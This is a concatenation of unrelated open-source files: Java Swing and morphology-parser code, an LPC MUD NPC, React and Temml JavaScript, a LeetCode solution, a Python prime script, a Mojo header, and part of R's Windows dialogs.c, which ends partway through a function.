import javax.sound.sampled.AudioFileFormat;
import javax.imageio.event.*;
import javax.imageio.metadata.*;
import javax.imageio.plugins.jpeg.*;
import javax.imageio.plugins.bmp.*;
import javax.imageio.spi.*;
import javax.imageio.stream.*;
import javax.imageio.*;
//import javax.activation.URLDataSource.*;
import java.awt.geom.Point2D.*;
import javax.swing.text.*;
import javax.swing.text.html.*;
import javax.swing.text.html.parser.*;
import javax.swing.text.html.HTMLEditorKit.*;
import javax.swing.text.html.HTMLDocument.*;
import javax.swing.text.html.ParagraphView;
import java.awt.datatransfer.*;
import javax.swing.text.Element;
import javax.swing.text.Document;
import java.sql.*;
//import javax.jms.*;
import javax.naming.*;
//import javax.xml.xquery.XQConnection;
//import javax.xml.xquery.XQDataSource;
//import javax.xml.xquery.XQException;
//import javax.xml.xquery.XQPreparedExpression;
//import javax.xml.xquery.XQResultSequence;
//import com.saxonica.xqj.SaxonXQDataSource;
//import sun.misc.Unsafe;
//import sun.reflect.ReflectionFactory;
/**
 * An {@link HTMLEditorKit} supporting collapsible regions in the document.
 * Clicking the small toggle area in the top-left corner of a
 * {@code CollapsibleView} expands or collapses it; hovering over that area
 * switches to a hand cursor.
 *
 * <p>NOTE(review): {@code CollapsibleView} and
 * {@code ehsConstants.COLLAPSIBLE_AREA_ELEMENT} are defined elsewhere in this
 * project.
 */
public class CollapsibleEditorKit extends HTMLEditorKit { //StyledEditorKit {

    /** Toggles a collapsible view when its toggle area is clicked. */
    MouseListener lstCollapse = new MouseAdapter() {
        public void mouseClicked(MouseEvent e) {
            JEditorPane src = (JEditorPane) e.getSource();
            int pos = src.viewToModel(e.getPoint());
            CollapsibleView cv = findCollapsibleView(src, pos, e.getPoint());
            if (cv == null) {
                return;
            }
            cv.setExpanded(!cv.isExpanded());
            // Force a re-layout of the document by inserting and immediately
            // removing a newline at the clicked position.
            DefaultStyledDocument doc = (DefaultStyledDocument) src.getDocument();
            try {
                doc.insertString(pos, "\n", new SimpleAttributeSet());
                doc.remove(pos, 1);
            } catch (BadLocationException e1) {
                e1.printStackTrace();
            }
        }
    };

    /** Pane cursor captured on first mouse-move, restored when leaving a toggle area. */
    Cursor oldCursor;

    /** Shows a hand cursor while the mouse hovers over a toggle area. */
    MouseMotionListener lstMoveCollapse = new MouseMotionAdapter() {
        public void mouseMoved(MouseEvent e) {
            JEditorPane src = (JEditorPane) e.getSource();
            if (oldCursor == null) {
                oldCursor = src.getCursor();
            }
            int pos = src.viewToModel(e.getPoint());
            if (findCollapsibleView(src, pos, e.getPoint()) != null) {
                src.setCursor(Cursor.getPredefinedCursor(Cursor.HAND_CURSOR));
                return;
            }
            src.setCursor(oldCursor);
        }
    };

    /**
     * Walks the view hierarchy from the root down towards {@code pos} and
     * returns the enclosing {@link CollapsibleView} if {@code p} lies within
     * its toggle area, or {@code null} otherwise.
     * (Shared by both mouse listeners; previously this logic was duplicated.)
     */
    private CollapsibleView findCollapsibleView(JEditorPane src, int pos, Point p) {
        View v = src.getUI().getRootView(src);
        while (v != null && !(v instanceof CollapsibleView)) {
            int i = v.getViewIndex(pos, Position.Bias.Forward);
            v = v.getView(i);
        }
        if (v == null) {
            return null;
        }
        Shape a = getAllocation(v, src);
        if (a == null) {
            return null;
        }
        Rectangle r = a instanceof Rectangle ? (Rectangle) a : a.getBounds();
        // The toggle area is a small square in the view's top-left corner.
        r.width = CollapsibleView.AREA_SHIFT;
        r.height = CollapsibleView.AREA_SHIFT;
        return r.contains(p) ? (CollapsibleView) v : null;
    }

    public ViewFactory getViewFactory() {
        return new CollapsibleEditorKit.StyledViewFactory();
    }

    public void install(JEditorPane c) {
        super.install(c);
        c.addMouseListener(lstCollapse);
        c.addMouseMotionListener(lstMoveCollapse);
    }

    public void deinstall(JEditorPane c) {
        c.removeMouseListener(lstCollapse);
        c.removeMouseMotionListener(lstMoveCollapse);
        super.deinstall(c);
    }

    /**
     * Computes the on-screen allocation of a view by accumulating child
     * allocations from the root down, offset by the pane's insets.
     */
    protected Shape getAllocation(View v, JEditorPane edit) {
        Insets ins = edit.getInsets();
        View vParent = v.getParent();
        int x = ins.left;
        int y = ins.top;
        while (vParent != null) {
            int i = vParent.getViewIndex(v.getStartOffset(), Position.Bias.Forward);
            Shape alloc = vParent.getChildAllocation(i, new Rectangle(0, 0, Short.MAX_VALUE, Short.MAX_VALUE));
            x += alloc.getBounds().x;
            y += alloc.getBounds().y;
            vParent = vParent.getParent();
        }
        if (v instanceof BoxView) {
            int ind = v.getParent().getViewIndex(v.getStartOffset(), Position.Bias.Forward);
            Rectangle r2 = v.getParent().getChildAllocation(ind, new Rectangle(0, 0, Integer.MAX_VALUE, Integer.MAX_VALUE)).getBounds();
            return new Rectangle(x, y, r2.width, r2.height);
        }
        return new Rectangle(x, y, (int) v.getPreferredSpan(View.X_AXIS), (int) v.getPreferredSpan(View.Y_AXIS));
    }

    /** Maps element names to views; collapsible elements get a CollapsibleView. */
    class StyledViewFactory implements ViewFactory {
        public View create(Element elem) {
            String kind = elem.getName();
            if (kind != null) {
                if (kind.equals(AbstractDocument.ContentElementName)) {
                    return new LabelView(elem);
                } else if (kind.equals(AbstractDocument.ParagraphElementName)) {
                    return new ParagraphView(elem);
                } else if (kind.equals(AbstractDocument.SectionElementName)) {
                    return new BoxView(elem, View.Y_AXIS);
                } else if (kind.equals(StyleConstants.ComponentElementName)) {
                    return new ComponentView(elem);
                } else if (kind.equals(StyleConstants.IconElementName)) {
                    return new IconView(elem);
                } else if (kind.equals(ehsConstants.COLLAPSIBLE_AREA_ELEMENT)) {
                    return new CollapsibleView(elem);
                }
            }
            // default to text display
            return new LabelView(elem);
        }
    }
}
|
aliok/trnltk-java
|
web/src/test/java/org/trnltk/web/training/TrainingSetCreatorParserSelectionTest.java
|
/*
* Copyright 2013 <NAME> (<EMAIL>)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.trnltk.web.training;
import com.google.common.base.Charsets;
import com.google.common.collect.HashMultimap;
import com.google.common.collect.Ordering;
import com.google.common.io.Files;
import com.google.common.io.Resources;
import com.google.common.primitives.Ints;
import org.apache.commons.lang3.tuple.Pair;
import org.junit.Ignore;
import org.junit.Test;
import org.trnltk.model.lexicon.Root;
import org.trnltk.model.morpheme.MorphemeContainer;
import org.trnltk.morphology.contextless.parser.MorphologicParser;
import org.trnltk.morphology.contextless.parser.PredefinedPaths;
import org.trnltk.morphology.contextless.parser.SuffixApplier;
import org.trnltk.morphology.contextless.parser.ContextlessMorphologicParser;
import org.trnltk.morphology.contextless.parser.PhoneticAttributeSets;
import org.trnltk.morphology.contextless.parser.SuffixFormGraph;
import org.trnltk.morphology.contextless.parser.SuffixFormGraphExtractor;
import org.trnltk.morphology.contextless.rootfinder.*;
import org.trnltk.morphology.lexicon.RootMapFactory;
import org.trnltk.morphology.morphotactics.*;
import org.trnltk.morphology.phonetics.PhoneticsAnalyzer;
import org.trnltk.morphology.phonetics.PhoneticsEngine;
import org.trnltk.util.MorphemeContainerFormatter;
import java.io.File;
import java.io.IOException;
import java.util.*;
import static org.junit.Assert.fail;
/**
 * Verifies that the contextless morphologic parser used while creating
 * training sets produces exactly the parse results recorded in
 * {@code trainingSetParserExpectation.txt}.
 *
 * <p>{@code @Ignore}d by default: this is a long-running consistency check
 * rather than a unit test.
 */
public class TrainingSetCreatorParserSelectionTest {

    // Orders parse results by length first, then lexicographically; the
    // expectation file stores its results in this order.
    static final Ordering<String> byLengthOrdering = new Ordering<String>() {
        public int compare(String left, String right) {
            return Ints.compare(left.length(), right.length());
        }
    };

    @SuppressWarnings("unchecked")
    static final Ordering<String> parseResultOrdering = Ordering.compound(Arrays.asList(byLengthOrdering, Ordering.<String>natural()));

    /**
     * Parses every surface form from the expectation file and compares the
     * formatted results against the recorded expectations. All mismatches
     * are printed before the test fails, so the whole diff is visible.
     */
    @Test
    @Ignore
    public void shouldMatchExpectations() throws IOException {
        boolean hasError = false;
        final List<Pair<String, List<String>>> entries = getEntries();
        final MorphologicParser morphologicParser = createParser();
        for (Pair<String, List<String>> entry : entries) {
            final String surface = entry.getLeft();
            final List<String> expectedParseResult = entry.getRight();
            // Parse and format results the same way the expectation file does.
            final List<MorphemeContainer> morphemeContainers = morphologicParser.parseStr(surface);
            final List<String> retrieved = new ArrayList<String>(MorphemeContainerFormatter.formatMorphemeContainers(morphemeContainers));
            Collections.sort(retrieved, parseResultOrdering);
            if (!expectedParseResult.equals(retrieved)) {
                System.out.println("W " + surface);
                System.out.println("Expected");
                for (String s : expectedParseResult) {
                    System.out.println("- " + s);
                }
                System.out.println("Retrieved");
                for (String s : retrieved) {
                    System.out.println("- " + s);
                }
                hasError = true;
            }
        }
        if (hasError)
            fail();
    }

    /**
     * Sanity check on the loaded expectations: the parse results of every
     * entry must already be sorted with {@link #parseResultOrdering}.
     */
    private void validateEntries(List<Pair<String, List<String>>> entries) {
        for (Pair<String, List<String>> entry : entries) {
            final List<String> parseResults = entry.getRight();
            final boolean ordered = parseResultOrdering.isOrdered(parseResults);
            if (!ordered) {
                throw new RuntimeException("Parse results are not sorted! " + entry.getLeft());
            }
        }
    }

    /**
     * Reads the expectation file. Format: lines starting with "W " introduce
     * a surface form; subsequent lines starting with "- " list its expected
     * parse results. Any other line is an error.
     */
    private List<Pair<String, List<String>>> getEntries() throws IOException {
        final File expectationFile = new File(Resources.getResource("trainingSetParserExpectation.txt").getFile());
        final List<String> lines = Files.readLines(expectationFile, Charsets.UTF_8);
        final List<Pair<String, List<String>>> entries = new LinkedList<Pair<String, List<String>>>();
        String currentSurface = null;
        List<String> currentExpectedParseResults = new LinkedList<String>();
        for (int i = 0; i < lines.size(); i++) {
            String line = lines.get(i);
            if (line.startsWith("W ")) {
                // a new surface form starts: flush the previous entry
                if (currentSurface != null) {
                    entries.add(Pair.of(currentSurface, currentExpectedParseResults));
                }
                currentSurface = line.substring(2);
                currentExpectedParseResults = new LinkedList<String>();
            } else if (line.startsWith("- ")) {
                currentExpectedParseResults.add(line.substring(2));
            } else {
                throw new RuntimeException("Illegal line : " + i);
            }
        }
        // flush the trailing entry
        if (currentSurface != null) {
            entries.add(Pair.of(currentSurface, currentExpectedParseResults));
        }
        validateEntries(entries);
        return entries;
    }

    /**
     * Builds the same contextless morphologic parser that the training-set
     * creator uses: bundled dictionaries, the full suffix-graph stack,
     * predefined paths and the root-finder chain.
     */
    private MorphologicParser createParser() {
        // load bundled dictionaries of numbers and words
        HashMultimap<String, ? extends Root> dictionaryRootMap = RootMapFactory.createSimpleWithNumbers();

        // build common parts
        final PhoneticsAnalyzer phoneticsAnalyzer = new PhoneticsAnalyzer();
        final PhoneticAttributeSets phoneticAttributeSets = new PhoneticAttributeSets();
        final SuffixFormSequenceApplier suffixFormSequenceApplier = new SuffixFormSequenceApplier();
        final PhoneticsEngine phoneticsEngine = new PhoneticsEngine(suffixFormSequenceApplier);
        final SuffixApplier suffixApplier = new SuffixApplier(phoneticsEngine);

        // build extractor which is used while converting a suffix graph to a suffix form graph
        final SuffixFormGraphExtractor suffixFormGraphExtractor = new SuffixFormGraphExtractor(suffixFormSequenceApplier, phoneticsAnalyzer, phoneticAttributeSets);

        // build suffix graphs
        final SuffixGraph suffixGraph = new CopulaSuffixGraph(new ProperNounSuffixGraph(new NumeralSuffixGraph(new BasicSuffixGraph())));
        suffixGraph.initialize();

        // build predefined paths with suffix graphs and dictionary
        final PredefinedPaths predefinedPaths = new PredefinedPaths(suffixGraph, dictionaryRootMap, suffixApplier);
        predefinedPaths.initialize();

        // build root finders and add them into the chain
        final DictionaryRootFinder dictionaryRootFinder = new DictionaryRootFinder(dictionaryRootMap);
        final RangeDigitsRootFinder rangeDigitsRootFinder = new RangeDigitsRootFinder();
        final OrdinalDigitsRootFinder ordinalDigitsRootFinder = new OrdinalDigitsRootFinder();
        final CardinalDigitsRootFinder cardinalDigitsRootFinder = new CardinalDigitsRootFinder();
        final ProperNounFromApostropheRootFinder properNounFromApostropheRootFinder = new ProperNounFromApostropheRootFinder();
        final ProperNounWithoutApostropheRootFinder properNounWithoutApostropheRootFinder = new ProperNounWithoutApostropheRootFinder();
        final PuncRootFinder puncRootFinder = new PuncRootFinder();

        final RootFinderChain rootFinderChain = new RootFinderChain(new RootValidator());

        // order matters: punctuation/digit finders stop the chain when they
        // handle the input; proper-noun and dictionary finders accumulate
        rootFinderChain
                .offer(puncRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
                .offer(rangeDigitsRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
                .offer(ordinalDigitsRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
                .offer(cardinalDigitsRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
                .offer(properNounFromApostropheRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
                .offer(properNounWithoutApostropheRootFinder, RootFinderChain.RootFinderPolicy.CONTINUE_ON_CHAIN)
                .offer(dictionaryRootFinder, RootFinderChain.RootFinderPolicy.CONTINUE_ON_CHAIN);

        // extract suffix form graph from suffix graph
        final SuffixFormGraph suffixFormGraph = suffixFormGraphExtractor.extract(suffixGraph);

        // finally, build parser
        final ContextlessMorphologicParser parser = new ContextlessMorphologicParser(suffixFormGraph, predefinedPaths, rootFinderChain, suffixApplier);

        return parser;
    }
}
|
cantona/NT6
|
nitan/d/tangmen/npc/boy.c
|
<reponame>cantona/NT6<filename>nitan/d/tangmen/npc/boy.c
//boy.c
inherit NPC;
void create()
{
int i,amun;
string *order = ({"張", "王", "李", "趙", "孫", "徐", "鄭", "周", "吳",
"蔣", "沈", "楊", "苗", "尹", "金", "魏", "陶", "俞", "柳", "朱"});
string *orderr = ({"包包", "寶寶", "乖乖", "小小", "磊磊",
"雞雞", "鴉鴉", "狗狗", "貓貓"});
set_name( order[random(20)] + orderr[random(8)], ({ "boy", "kid" }) );
set("title", "無知男孩");
set("gender", "男性" );
set("age", random(5)+4);
set("long",
"他很小, 很好欺服.\n");
set("chat_chance", 15);
set("chat_msg", ({
(: random_move :)
}) );
set("attitude", "peaceful");
set("combat_exp", random(1000));
set("max_qi", 100);
set("qi", 100);
set("max_jingli", 100);
set("jingli", 100);
set_skill("cuff", 1+random(10));
setup();
carry_object("clone/misc/cloth")->wear();
}
|
jpratt-mru/new.maco.calendar
|
src/components/RoomDoubleBookingIssue.js
|
<filename>src/components/RoomDoubleBookingIssue.js
import React from "react";
import styled from "styled-components";
const Issue = styled.div`
padding: 10px;
`;
const RoomDoubleBookingIssue = props => {
return (
<Issue className="alert alert-primary">
<p className="mb-0">
<span className="font-weight-bold">
{props.issue.room.toUpperCase()}
</span>{" "}
is double-booked with these classes:
<br />
<span className="font-weight-bold">
{props.issue.classes
.sort()
.join()
.toUpperCase()}
</span>
</p>
<p className="mb-0">
<a href={props.csvFileName} rel="noopener noreferrer" target="_blank">
csv
</a>{" "}
lines {props.issue.eventIds.sort((a, b) => a - b).join()}
</p>
</Issue>
);
};
export default RoomDoubleBookingIssue;
|
JoannaCode/LeetCode-Sol-Res
|
Medium/BestTimeStock2.java
|
<filename>Medium/BestTimeStock2.java
/**
* Say you have an array for which the ith element is the price of a given
* stock on day i.
*
* Design an algorithm to find the maximum profit. You may complete
* <strong>as many transactions as you like</strong> (ie, buy one and sell
* one share of the stock multiple times). However, you may not engage in
* multiple transactions at the same time (ie, you must sell the stock
* before you buy again).
*
* Tags: Array, Greedy
*/
class BestTimeStock2 {

    public static void main(String[] args) {
        int[] prices = { 1, 2, 10, 100 };
        System.out.println(maxProfit(prices));
    }

    /**
     * Greedy solution: with unlimited transactions, the optimal profit is the
     * sum of every positive day-to-day price increase.
     *
     * @param prices price of the stock on each day
     * @return maximum achievable profit (0 for empty or falling prices)
     */
    public static int maxProfit(int[] prices) {
        int profit = 0;
        for (int day = 1; day < prices.length; day++) {
            int gain = prices[day] - prices[day - 1];
            if (gain > 0) {
                profit += gain;
            }
        }
        return profit;
    }
}
|
pedrol3001/Compiler
|
Src/TabelaDeSimbolos/Jump/Jump.cpp
|
#include "Jump.h"
#include <cassert>
// Records the code line this label points at.
void LabelVal::setLinha(long long int _linha) {
    linha=_linha;
}
// Returns the recorded line; asserts a line was actually set (>= 0).
// NOTE(review): assumes `linha` is initialised to a negative sentinel in the
// class definition (Jump.h) — confirm.
long long int LabelVal::getLinha() {
    assert(linha>=0);
    return linha;
}
// Constructs the attribute tagged with the type name "LabelVal".
LabelVal::LabelVal(): Atributo("LabelVal") {}
|
upowerman/spring-boot-learning
|
spring-boot-web/src/main/java/com/yunus/base/IntToGenderConverter.java
|
package com.yunus.base;
import com.yunus.constant.Gender;
import org.springframework.core.convert.converter.Converter;
/**
 * Spring MVC converter that turns a numeric request parameter (e.g. "1")
 * into its {@link Gender} constant via {@code Gender.getByValue}.
 * Throws {@link NumberFormatException} for non-numeric input.
 */
public class IntToGenderConverter implements Converter<String, Gender> {

    @Override
    public Gender convert(String source) {
        final int genderValue = Integer.parseInt(source);
        return Gender.getByValue(genderValue);
    }
}
|
ronkok/Temml
|
src/functions/hbox.js
|
<gh_stars>1-10
import defineFunction, { ordargument } from "../defineFunction";
import { StyleLevel } from "../constants"
import mathMLTree from "../mathMLTree";
import * as mml from "../buildMathML";
// \hbox is provided for compatibility with LaTeX \vcenter.
// In LaTeX, \vcenter can act only on a box, as in
// \vcenter{\hbox{$\frac{a+b}{\dfrac{c}{d}}$}}
// This function by itself doesn't do anything but prevent a soft line break.
// Registers the \hbox parse handler and MathML builder with Temml.
defineFunction({
  type: "hbox",
  names: ["\\hbox"],
  props: {
    numArgs: 1,
    argTypes: ["hbox"], // argument is parsed with the "hbox" argument type
    allowedInArgument: true,
    allowedInText: false
  },
  // Wrap the single argument's parse nodes in an "hbox" node.
  handler({ parser }, args) {
    return {
      type: "hbox",
      mode: parser.mode,
      body: ordargument(args[0])
    };
  },
  // Build an <mrow> with the body rendered at text style level.
  mathmlBuilder(group, style) {
    const newOptions = style.withLevel(StyleLevel.TEXT)
    return new mathMLTree.MathNode("mrow", mml.buildExpression(group.body, newOptions));
  }
});
|
ShawonBarman/URI-Online-judge-Ad-Hoc-level-problem-solution-in-python
|
2116.py
|
<reponame>ShawonBarman/URI-Online-judge-Ad-Hoc-level-problem-solution-in-python<gh_stars>1-10
def primes_up_to(limit):
    """Return all primes in [2, limit] using trial division.

    Divisors are only tested up to sqrt(candidate) — the original scanned the
    full range, which was quadratic for no benefit.
    """
    primes = []
    for candidate in range(2, limit + 1):
        is_composite = False
        for divisor in range(2, int(candidate ** 0.5) + 1):
            if candidate % divisor == 0:
                is_composite = True
                break
        if not is_composite:
            primes.append(candidate)
    return primes


def largest_prime_at_most(n, primes):
    """Return the largest value in (ascending) `primes` that is <= n, or 0."""
    best = 0
    for p in primes:
        if p <= n:
            best = p
    return best


if __name__ == "__main__":
    # Same behaviour as the original script: read n and m, print the product
    # of the largest primes not exceeding each (0 if none exists).
    primes = primes_up_to(1000)
    n, m = map(int, input().split())
    print(largest_prime_at_most(n, primes) * largest_prime_at_most(m, primes))
|
blockspacer/chromium_base_conan
|
extensions/gen/mojo/public/cpp/bindings/tests/idle_tracking_unittest.test-mojom-shared-message-ids.h
|
// mojo/public/cpp/bindings/tests/idle_tracking_unittest.test-mojom-shared-message-ids.h is auto generated by mojom_bindings_generator.py, do not edit
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef MOJO_PUBLIC_CPP_BINDINGS_TESTS_IDLE_TRACKING_UNITTEST_TEST_MOJOM_SHARED_MESSAGE_IDS_H_
#define MOJO_PUBLIC_CPP_BINDINGS_TESTS_IDLE_TRACKING_UNITTEST_TEST_MOJOM_SHARED_MESSAGE_IDS_H_
#include <stdint.h>
namespace mojo {
namespace test {
namespace idle_tracking_unittest {
namespace mojom {
// Wire-stable message ordinals for the TestService interface. These values
// are salted SHA-256 hashes of the method names; both ends of a pipe rely on
// them matching, so they must never be edited by hand — regenerate this file
// with mojom_bindings_generator.py instead.
namespace internal {

// The 1611864242 value is based on sha256(salt + "TestService1").
constexpr uint32_t kTestService_Ping_Name = 1611864242;
// The 1206904002 value is based on sha256(salt + "TestService2").
constexpr uint32_t kTestService_PingPong_Name = 1206904002;
// The 1220089824 value is based on sha256(salt + "TestService3").
constexpr uint32_t kTestService_BindKeepAlive_Name = 1220089824;
}  // namespace internal
}  // namespace mojom
}  // namespace idle_tracking_unittest
}  // namespace test
}  // namespace mojo
#endif // MOJO_PUBLIC_CPP_BINDINGS_TESTS_IDLE_TRACKING_UNITTEST_TEST_MOJOM_SHARED_MESSAGE_IDS_H_
|
lifebit-ai/exomedepth
|
bin/R-3.5.1/src/library/utils/src/windows/dialogs.c
|
<filename>bin/R-3.5.1/src/library/utils/src/windows/dialogs.c<gh_stars>1-10
/*
* R : A Computer Language for Statistical Data Analysis
* file dialogs.c
* Copyright (C) 1998--2003 <NAME> and <NAME>
* Copyright (C) 2004 The R Foundation
* Copyright (C) 2005--2017 The R Core Team
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, a copy is available at
* https://www.R-project.org/Licenses/
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <Defn.h>
#include "graphapp/ga.h"
#include <windows.h>
#undef ERROR
#include <R_ext/RS.h> /* for Calloc */
#include "win-nls.h"
#include "rui.h"
#include "Startup.h"
/* State for one native Windows progress-bar dialog, owned and finalized
   through an R external pointer (see pbarFinalizer). */
typedef struct {
    window wprog;          /* top-level dialog window */
    progressbar pb;        /* the bar control itself */
    label lab;             /* optional text label; NULL when none requested */
    int width;             /* bar width in pixels; also the control's max value */
    double min, max, val;  /* user-visible range and current value */
} winprogressbar;
/* Finalizer for the winProgressBar external pointer: hides and destroys the
   native controls, frees the struct, and clears the pointer so a second call
   (e.g. explicit close followed by GC) is a harmless no-op. */
static void pbarFinalizer(SEXP ptr)
{
    winprogressbar *pbar;

    if(TYPEOF(ptr) != EXTPTRSXP) return;  /* not an external pointer */
    pbar = R_ExternalPtrAddr(ptr);
    if(!pbar) return;  /* already finalized */
    hide(pbar->wprog);
    if(pbar-> lab) del(pbar->lab);  /* label only exists when one was requested */
    del(pbar->pb);
    del(pbar->wprog);
    Free(pbar);
    R_ClearExternalPtr(ptr); /* not really needed */
}
/* winProgressBar(width, title, label, min, max, initial)

   Creates a native progress-bar dialog and returns it as an external pointer
   whose finalizer (pbarFinalizer) destroys the window. The pixel width doubles
   as the bar control's maximum, so values are mapped to pixels below.
   NOTE(review): assumes max > min — the (max - min) division below would
   otherwise divide by zero; confirm the R-level wrapper validates this. */
SEXP winProgressBar(SEXP call, SEXP op, SEXP args, SEXP env)
{
    SEXP tmp, ptr;
    int width, iv;
    double d;
    const char *title, *label;
    winprogressbar *pbar;
    Rboolean haveLabel;

    args = CDR(args);
    pbar = Calloc(1, winprogressbar);  /* zeroed: pbar->lab is NULL by default */
    width = asInteger(CAR(args)); args = CDR(args);
    if(width == NA_INTEGER || width < 0) width = 200;  /* fallback width */
    tmp = CAR(args); args = CDR(args);
    if(!isString(tmp) || length(tmp) < 1 || STRING_ELT(tmp, 0) == NA_STRING)
	errorcall(call, "invalid '%s' argument", "title");
    title = translateChar(STRING_ELT(tmp, 0));
    tmp = CAR(args); args = CDR(args);
    /* NOTE(review): "Label" is capitalised here but "label" elsewhere —
       harmless, but inconsistent in the user-visible error message. */
    if(!isString(tmp) || length(tmp) < 1 || STRING_ELT(tmp, 0) == NA_STRING)
	errorcall(call, "invalid '%s' argument", "Label");
    label = translateChar(STRING_ELT(tmp, 0));
    haveLabel = strlen(label) > 0;
    d = asReal(CAR(args)); args = CDR(args);
    if (!R_FINITE(d)) errorcall(call, "invalid '%s' argument", "min");
    pbar->min = d;
    d = asReal(CAR(args)); args = CDR(args);
    if (!R_FINITE(d)) errorcall(call, "invalid '%s' argument", "max");
    pbar->max = d;
    d = asReal(CAR(args)); args = CDR(args);
    if (!R_FINITE(d)) errorcall(call, "invalid '%s' argument", "initial");
    pbar->val = d;
    pbar->width = width;
    /* Taller window when a label line is shown above the bar. */
    pbar->wprog = newwindow(title, rect(0, 0, width+40, haveLabel ? 100: 80),
			    Titlebar | Centered);
    setbackground(pbar->wprog, dialog_bg());
    if(haveLabel)
	pbar->lab = newlabel(label, rect(10, 15, width+20, 25), AlignCenter);
    pbar->pb = newprogressbar(rect(20, haveLabel ? 50 : 30, width, 20),
			      0, width, 1, 1);
    /* Map the initial value into [0, width] pixels. */
    iv = pbar->width * (pbar->val - pbar->min)/(pbar->max - pbar->min);
    setprogressbar(pbar->pb, iv);
    show(pbar->wprog);
    ptr = R_MakeExternalPtr(pbar, install("winProgressBar"), R_NilValue);
    /* onexit=TRUE: finalize even on R shutdown so the window is destroyed. */
    R_RegisterCFinalizerEx(ptr, pbarFinalizer, TRUE);
    return ptr;
}
/* Explicitly closes a progress bar by running its finalizer now; the later
   GC-triggered finalizer call then no-ops on the cleared pointer. */
SEXP closeWinProgressBar(SEXP call, SEXP op, SEXP args, SEXP env)
{
    pbarFinalizer(CADR(args));
    return R_NilValue;
}
/* setWinProgressBar(ptr, value, title, label)

   Updates an existing progress bar: moves the bar when `value` is finite and
   within [min, max], and optionally retitles the window / relabels the text.
   Returns the bar's value *before* this update, invisibly usable by callers. */
SEXP setWinProgressBar(SEXP call, SEXP op, SEXP args, SEXP env)
{
    args = CDR(args);
    SEXP ptr = CAR(args);
    winprogressbar *pbar;
    double value;

    pbar = R_ExternalPtrAddr(ptr);
    if(!pbar)
	error("invalid progressbar -- has it been closed?");
    value = pbar->val;  /* previous value is the return value */
    if(!isNull(CADR(args))) {
	int iv;
	double val = asReal(CADR(args));
	SEXP title = CADDR(args), label = CADDDR(args);

	/* Out-of-range or non-finite values are silently ignored. */
	if (R_FINITE(val) && val >= pbar->min && val <= pbar->max) {
	    iv = pbar->width * (val - pbar->min)/(pbar->max - pbar->min);
	    setprogressbar(pbar->pb, iv);
	    pbar->val = val;
	}
	if (!isNull(title)) {
	    SEXP ctxt;
	    if(!isString(title) || length(title) < 1)
		errorcall(call, "invalid '%s' argument", "title");
	    ctxt = STRING_ELT(title, 0);
	    if (ctxt != NA_STRING)
		settext(pbar->wprog, translateChar(ctxt));
	}
	/* Label can only be updated if the bar was created with one. */
	if(pbar->lab && !isNull(label)) {
	    SEXP clab;
	    if(!isString(label) || length(label) < 1)
		errorcall(call, "invalid '%s' argument", "label");
	    clab = STRING_ELT(label, 0);
	    if (clab != NA_STRING)
		settext(pbar->lab, translateChar(clab));
	}
    }
    return ScalarReal(value);
}
/* winDialog(type, message)

   Shows a modal message box of the requested type and returns the user's
   choice as an integer. NOTE(review): the numeric codes (10 for "ok",
   askokcancel's YES remapped to 2) presumably match the R-level winDialog()
   mapping of button constants — confirm against the graphapp ask* API. */
SEXP winDialog(SEXP call, SEXP op, SEXP args, SEXP env)
{
    SEXP message;
    const char * type;
    int res=YES;

    args = CDR(args);
    type = translateChar(STRING_ELT(CAR(args), 0));
    message = CADR(args);
    /* graphapp dialogs truncate long text; cap the message at 999 chars. */
    if(!isString(message) || length(message) != 1 ||
       strlen(translateChar(STRING_ELT(message, 0))) > 999)
	error(_("invalid '%s' argument"), "message");
    if (strcmp(type, "ok")  == 0) {
	askok(translateChar(STRING_ELT(message, 0)));
	res = 10;
    } else if (strcmp(type, "okcancel")  == 0) {
	res = askokcancel(translateChar(STRING_ELT(message, 0)));
	if(res == YES) res = 2;
    } else if (strcmp(type, "yesno")  == 0) {
	res = askyesno(translateChar(STRING_ELT(message, 0)));
    } else if (strcmp(type, "yesnocancel")  == 0) {
	res = askyesnocancel(translateChar(STRING_ELT(message, 0)));
    } else
	errorcall(call, _("unknown type"));
    return ScalarInteger(res);
}
/* winDialogString(message, default)

   Prompts the user for a string with a pre-filled default. Returns the typed
   string, or R_NilValue when the dialog was cancelled (askstring -> NULL). */
SEXP winDialogString(SEXP call, SEXP op, SEXP args, SEXP env)
{
    SEXP  message, def;
    const char *string;

    args = CDR(args);
    message = CAR(args);
    if(!isString(message) || length(message) != 1 ||
       strlen(translateChar(STRING_ELT(message, 0))) > 255)
	error(_("invalid '%s' argument"), "message");
    def = CADR(args);
    if(!isString(def) || length(def) != 1)
	error(_("invalid '%s' argument"), "default");
    string = askstring(translateChar(STRING_ELT(message, 0)),
		       translateChar(STRING_ELT(def, 0)));
    if (string) return mkString(string);
    else return R_NilValue;
}
static char msgbuf[256];
/* winMenuNames(): returns a character vector of the user-defined RGui menu
   names. Only valid when running under the RGui front end. */
SEXP winMenuNames(SEXP call, SEXP op, SEXP args, SEXP env)
{
    SEXP menuNames;
    int i, nmenus;

    args = CDR(args);
    if (CharacterMode != RGui)
	errorcall(call, _("menu functions can only be used in the GUI"));

    nmenus = numwinmenus();

    PROTECT(menuNames = allocVector(STRSXP, nmenus));

